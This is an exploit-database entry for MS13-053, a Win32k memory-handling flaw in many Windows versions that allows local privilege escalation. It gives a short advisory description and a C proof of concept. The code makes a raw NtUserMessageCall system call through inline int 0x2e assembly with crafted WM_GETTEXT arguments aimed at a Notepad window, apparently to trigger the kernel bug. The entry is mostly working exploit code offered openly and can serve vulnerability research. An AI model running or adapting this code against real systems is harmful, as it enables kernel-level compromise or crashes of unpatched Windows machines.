MS13-053 Win32k Memory Allocation Vulnerability

2013-09-12T00:00:00
ID 1337DAY-ID-21226
Type zdt
Reporter 0xbigban
Modified 2013-09-12T00:00:00

Description

win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Allocation Vulnerability."

/*
	more details:
	https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up-kernel-exploit/
	this poc is written by 0xBigBan
*/
#include <windows.h>
#include <stdlib.h>   // malloc / free

#define __NtUserMessageCall 0x11ea //syscall number on win7 sp1 x86 (differs on other builds)

// Invoke a win32k system service directly (32-bit MSVC inline asm).
// edx is pointed at the first argument after ApiNumber, eax holds the
// service number, and int 0x2e is the legacy kernel entry on x86.
void SystemCall(DWORD ApiNumber, ...) {
	__asm{
		lea edx, [ebp+0x0c]   // address of the first variadic argument
		mov eax, ApiNumber    // system service number
		int 0x2e              // enter the kernel
		leave
		ret                   // return to caller, skipping the compiler epilogue
	}
}

int main() {
	//a file named a.txt must already be open in Notepad so its window can be found
	HWND handle = FindWindowA(NULL, "a.txt - notepad");
	if (handle == NULL) {
		return 1;   //no matching Notepad window; nothing to send the message to
	}
	void* ptr = malloc(sizeof(int)*2);   //8-byte user-mode buffer

	SystemCall(__NtUserMessageCall,
				handle,
				WM_GETTEXT,
				0x8,	//buffer size
				ptr,	//user mode buffer
				0x0,
				0x2b3,
				0x2);	//ASCII boolean/flag
	free(ptr);
	return 0;
}

#  0day.today [2018-02-18]  #